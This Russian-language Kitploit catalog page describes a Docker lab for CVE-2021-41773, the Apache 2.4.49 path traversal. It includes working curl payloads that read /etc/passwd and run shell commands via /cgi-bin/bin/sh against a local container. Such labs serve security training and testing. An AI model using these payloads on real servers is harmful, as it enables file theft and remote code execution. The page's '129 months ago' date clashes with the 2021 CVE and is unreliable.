Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773S — Docker-лаборатория с уязвимостями для CVE-2021-41773 — обход пути в Apache, предоставляющая PoC-конфигурации для чтения файлов и удалённого выполнения кода в контролируемой среде. | Kitploit
Инструменты/GitHubGitHub/mightysai1997/cve-2021-41773s
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеЛаборатории и Практика
GitHubmightysai1997/cve-2021-41773s

CVE-2021-41773S

Docker-лаборатория с уязвимостями для CVE-2021-41773 — обход пути в Apache, предоставляющая PoC-конфигурации для чтения файлов и удалённого выполнения кода в контролируемой среде.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
129 месяцев назадЕщё не проверено

Уязвимые Docker-образы для CVE-2021-41773 Apache path traversal

Эта уязвимость применима только к версии 2.4.49 с определёнными нестандартными конфигурациями. В определённых ситуациях это может привести либо к чтению файлов, либо к выполнению кода.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Конфигурация, уязвимая для чтения файлов

Контейнеры можно загрузить напрямую из Docker Hub с помощью

docker pull blueteamsteve/cve-2021-41773:no-cgid

и запустить, используя

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Журналы Apache можно просмотреть с помощью команды ниже, либо просто уберите "-dit" из команды запуска выше, чтобы выводить stdout в потоковом режиме docker logs <container-id>

PoC для чтения файлов

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Конфигурация, уязвимая для RCE

Контейнеры можно загрузить напрямую из Docker Hub с помощью

docker pull blueteamsteve/cve-2021-41773:with-cgid

и запустить, используя

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Журналы Apache можно просмотреть с помощью команды ниже, либо просто уберите "-dit" из команды запуска выше, чтобы выводить stdout в потоковом режиме docker logs <container-id>

PoC для RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Создание собственных Docker-контейнеров

Изменяйте и собирайте собственные версии, используя dockerfile и шаблоны файлов httpd.conf в подкаталогах

  • Используйте ./no-cgi для конфигурации, уязвимой для чтения файлов
  • Используйте ./with-cgi для конфигурации, уязвимой для выполнения кода
Скачать инструмент